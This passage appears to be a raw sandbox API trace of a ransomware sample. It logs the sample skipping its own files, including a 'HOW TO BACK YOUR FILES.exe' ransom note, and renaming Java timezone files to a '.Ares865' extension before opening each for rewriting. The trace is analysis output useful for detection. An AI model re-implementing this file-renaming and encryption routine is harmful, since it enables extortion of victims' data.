lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7452f340, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52cdcf20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52cdcf20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0135.095] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0135.095] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0135.095] lstrcpyW (in: lpString1=0x2cce460, lpString2="Adak" | out: lpString1="Adak") returned="Adak" [0135.095] lstrlenW (lpString="Adak") returned 4 [0135.095] lstrlenW (lpString="Ares865") returned 7 [0135.095] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Adak.Ares865") returned 60 [0135.095] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Adak" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\adak"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Adak.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\adak.ares865"), dwFlags=0x1) returned 1 [0135.097] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Adak.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\adak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.097] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1224) returned 1 [0135.100] lstrcpyW (in: lpString1=0x2cce460, lpString2="Anchorage" | out: lpString1="Anchorage") returned="Anchorage" [0135.100] lstrlenW (lpString="Anchorage") returned 9 [0135.100] lstrlenW (lpString="Ares865") returned 7 [0135.101] lstrcmpiW (lpString1="chorage", lpString2="Ares865") returned 1 [0135.101] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anchorage.Ares865") returned 65 [0135.101] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anchorage" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\anchorage"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anchorage.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\anchorage.ares865"), dwFlags=0x1) returned 1 [0135.102] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anchorage.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\anchorage.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.102] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1224) returned 1 [0135.105] lstrcpyW (in: lpString1=0x2cce460, lpString2="Anguilla" | out: lpString1="Anguilla") returned="Anguilla" [0135.105] lstrlenW (lpString="Anguilla") returned 8 [0135.105] lstrlenW (lpString="Ares865") returned 7 [0135.105] lstrcmpiW (lpString1="nguilla", lpString2="Ares865") returned 1 [0135.106] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anguilla.Ares865") returned 64 [0135.106] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anguilla" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\anguilla"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anguilla.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\anguilla.ares865"), dwFlags=0x1) returned 1 [0135.107] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Anguilla.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\anguilla.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.107] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65) returned 1 [0135.110] lstrcpyW (in: lpString1=0x2cce460, lpString2="Antigua" | out: lpString1="Antigua") returned="Antigua" [0135.111] lstrlenW (lpString="Antigua") returned 7 [0135.111] lstrlenW (lpString="Ares865") returned 7 [0135.111] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Antigua.Ares865") returned 63 [0135.111] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Antigua" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\antigua"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Antigua.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\antigua.ares865"), dwFlags=0x1) returned 1 [0135.113] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Antigua.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\antigua.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.113] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0135.116] lstrcpyW (in: lpString1=0x2cce460, lpString2="Araguaina" | out: lpString1="Araguaina") returned="Araguaina" [0135.116] lstrlenW (lpString="Araguaina") returned 9 [0135.116] lstrlenW (lpString="Ares865") returned 7 [0135.116] lstrcmpiW (lpString1="aguaina", lpString2="Ares865") returned -1 [0135.116] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Araguaina.Ares865") returned 65 [0135.116] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Araguaina" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\araguaina"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Araguaina.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\araguaina.ares865"), dwFlags=0x1) returned 1 [0135.118] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Araguaina.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\araguaina.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.118] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=892) returned 1 [0135.120] lstrcpyW (in: lpString1=0x2cce460, lpString2="Argentina" | out: lpString1="Argentina") returned="Argentina" [0135.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7bc8 [0135.120] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1708 [0135.120] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bd0 | out: ListHead=0x2e7710, ListEntry=0x2e7bd0) returned 0x2e7b70 [0135.121] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7452f340, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7452f340, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7452f340, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Aruba", cAlternateFileName="")) returned 1 [0135.121] lstrcmpiW (lpString1="Aruba", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0135.121] lstrcmpiW (lpString1="Aruba", lpString2="aoldtz.exe") returned 1 [0135.121] lstrcpyW (in: lpString1=0x2cce460, lpString2="Aruba" | out: lpString1="Aruba") returned="Aruba" [0135.121] lstrlenW (lpString="Aruba") returned 5 [0135.121] lstrlenW (lpString="Ares865") returned 7 [0135.121] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Aruba.Ares865") returned 61 [0135.121] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Aruba" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\aruba"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Aruba.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\aruba.ares865"), dwFlags=0x1) returned 1 [0135.123] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Aruba.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\aruba.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.123] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0135.126] lstrcpyW (in: lpString1=0x2cce460, lpString2="Asuncion" | out: lpString1="Asuncion") returned="Asuncion" [0135.126] lstrlenW (lpString="Asuncion") returned 8 [0135.126] lstrlenW (lpString="Ares865") returned 7 [0135.126] lstrcmpiW (lpString1="suncion", lpString2="Ares865") returned 1 [0135.127] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Asuncion.Ares865") returned 64 [0135.127] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Asuncion" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\asuncion"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Asuncion.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\asuncion.ares865"), dwFlags=0x1) returned 1 [0135.128] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Asuncion.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\asuncion.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.128] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1116) returned 1 [0135.131] lstrcpyW (in: lpString1=0x2cce460, lpString2="Atikokan" | out: lpString1="Atikokan") returned="Atikokan" [0135.131] lstrlenW (lpString="Atikokan") returned 8 [0135.131] lstrlenW (lpString="Ares865") returned 7 [0135.131] lstrcmpiW (lpString1="tikokan", lpString2="Ares865") returned 1 [0135.132] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Atikokan.Ares865") returned 64 [0135.132] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Atikokan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\atikokan"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Atikokan.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\atikokan.ares865"), dwFlags=0x1) returned 1 [0135.133] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Atikokan.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\atikokan.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.134] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=93) returned 1 [0135.137] lstrcpyW (in: lpString1=0x2cce460, lpString2="Bahia" | out: lpString1="Bahia") returned="Bahia" [0135.137] lstrlenW (lpString="Bahia") returned 5 [0135.137] lstrlenW (lpString="Ares865") returned 7 [0135.137] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia.Ares865") returned 61 [0135.137] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia.ares865"), dwFlags=0x1) returned 1 [0135.139] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.139] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=553) returned 1 [0135.142] lstrcpyW (in: lpString1=0x2cce460, lpString2="Bahia_Banderas" | out: lpString1="Bahia_Banderas") returned="Bahia_Banderas" [0135.142] lstrlenW (lpString="Bahia_Banderas") returned 14 [0135.142] lstrlenW (lpString="Ares865") returned 7 [0135.142] lstrcmpiW (lpString1="anderas", lpString2="Ares865") returned -1 [0135.143] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia_Banderas.Ares865") returned 70 [0135.143] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia_Banderas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia_banderas"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia_Banderas.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia_banderas.ares865"), dwFlags=0x1) returned 1 [0135.144] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia_Banderas.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia_banderas.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.144] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=844) returned 1 [0135.147] lstrcpyW (in: lpString1=0x2cce460, lpString2="Barbados" | out: lpString1="Barbados") returned="Barbados" [0135.147] lstrlenW (lpString="Barbados") returned 8 [0135.147] lstrlenW (lpString="Ares865") returned 7 [0135.147] lstrcmpiW (lpString1="arbados", lpString2="Ares865") returned -1 [0135.148] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Barbados.Ares865") returned 64 [0135.148] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Barbados" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\barbados"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Barbados.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\barbados.ares865"), dwFlags=0x1) returned 1 [0135.150] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Barbados.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\barbados.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.150] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=137) returned 1 [0135.153] lstrcpyW (in: lpString1=0x2cce460, lpString2="Belem" | out: lpString1="Belem") returned="Belem" [0135.153] lstrlenW (lpString="Belem") returned 5 [0135.153] lstrlenW (lpString="Ares865") returned 7 [0135.153] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belem.Ares865") returned 61 [0135.153] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belem" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belem"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belem.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belem.ares865"), dwFlags=0x1) returned 1 [0135.155] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belem.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belem.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.155] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=297) returned 1 [0135.158] lstrcpyW (in: lpString1=0x2cce460, lpString2="Belize" | out: lpString1="Belize") returned="Belize" [0135.158] lstrlenW (lpString="Belize") returned 6 [0135.158] lstrlenW (lpString="Ares865") returned 7 [0135.159] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belize.Ares865") returned 62 [0135.159] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belize" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belize"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belize.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belize.ares865"), dwFlags=0x1) returned 1 [0135.160] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Belize.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\belize.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.160] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=513) returned 1 [0135.166] lstrcpyW (in: lpString1=0x2cce460, lpString2="Blanc-Sablon" | out: lpString1="Blanc-Sablon") returned="Blanc-Sablon" [0135.166] lstrlenW (lpString="Blanc-Sablon") returned 12 [0135.166] lstrlenW (lpString="Ares865") returned 7 [0135.166] lstrcmpiW (lpString1="-Sablon", lpString2="Ares865") returned 1 [0135.166] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Blanc-Sablon.Ares865") returned 68 [0135.166] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Blanc-Sablon" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\blanc-sablon"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Blanc-Sablon.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\blanc-sablon.ares865"), dwFlags=0x1) returned 1 [0135.168] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Blanc-Sablon.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\blanc-sablon.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.168] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=93) returned 1 [0135.171] lstrcpyW (in: lpString1=0x2cce460, lpString2="Boa_Vista" | out: lpString1="Boa_Vista") returned="Boa_Vista" [0135.171] lstrlenW (lpString="Boa_Vista") returned 9 [0135.172] lstrlenW (lpString="Ares865") returned 7 [0135.172] lstrcmpiW (lpString1="a_Vista", lpString2="Ares865") returned -1 [0135.172] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boa_Vista.Ares865") returned 65 [0135.172] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boa_Vista" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boa_vista"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boa_Vista.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boa_vista.ares865"), dwFlags=0x1) returned 1 [0135.173] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boa_Vista.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boa_vista.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.173] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=329) returned 1 [0135.176] lstrcpyW (in: lpString1=0x2cce460, lpString2="Bogota" | out: lpString1="Bogota") returned="Bogota" [0135.176] lstrlenW (lpString="Bogota") returned 6 [0135.176] lstrlenW (lpString="Ares865") returned 7 [0135.177] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bogota.Ares865") returned 62 [0135.177] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bogota" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bogota"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bogota.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bogota.ares865"), dwFlags=0x1) returned 1 [0135.179] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bogota.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bogota.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.179] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89) returned 1 [0135.182] lstrcpyW (in: lpString1=0x2cce460, lpString2="Boise" | out: lpString1="Boise") returned="Boise" [0135.182] lstrlenW (lpString="Boise") returned 5 [0135.182] lstrlenW (lpString="Ares865") returned 7 [0135.182] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boise.Ares865") returned 61 [0135.182] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boise" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boise"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boise.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boise.ares865"), dwFlags=0x1) returned 1 [0135.184] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boise.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boise.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.184] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1284) returned 1 [0135.187] lstrcpyW (in: lpString1=0x2cce460, lpString2="Cambridge_Bay" | out: lpString1="Cambridge_Bay") returned="Cambridge_Bay" [0135.187] lstrlenW (lpString="Cambridge_Bay") returned 13 [0135.187] lstrlenW (lpString="Ares865") returned 7 [0135.187] lstrcmpiW (lpString1="dge_Bay", lpString2="Ares865") returned 1 [0135.187] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cambridge_Bay.Ares865") returned 69 [0135.187] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cambridge_Bay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cambridge_bay"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cambridge_Bay.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cambridge_bay.ares865"), dwFlags=0x1) returned 1 [0135.189] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cambridge_Bay.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cambridge_bay.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.189] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1076) returned 1 [0135.192] lstrcpyW (in: lpString1=0x2cce460, lpString2="Campo_Grande" | out: lpString1="Campo_Grande") returned="Campo_Grande" [0135.192] lstrlenW (lpString="Campo_Grande") returned 12 [0135.192] lstrlenW (lpString="Ares865") returned 7 [0135.192] lstrcmpiW (lpString1="_Grande", lpString2="Ares865") returned -1 [0135.193] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Campo_Grande.Ares865") returned 68 [0135.193] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Campo_Grande" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\campo_grande"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Campo_Grande.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\campo_grande.ares865"), dwFlags=0x1) returned 1 [0135.195] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Campo_Grande.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\campo_grande.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0135.195] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1116) returned 1 [0135.197] lstrcpyW (in: lpString1=0x2cce460, lpString2="Cancun" | out: lpString1="Cancun") returned="Cancun" [0135.197] lstrlenW (lpString="Cancun") returned 6 [0135.197] 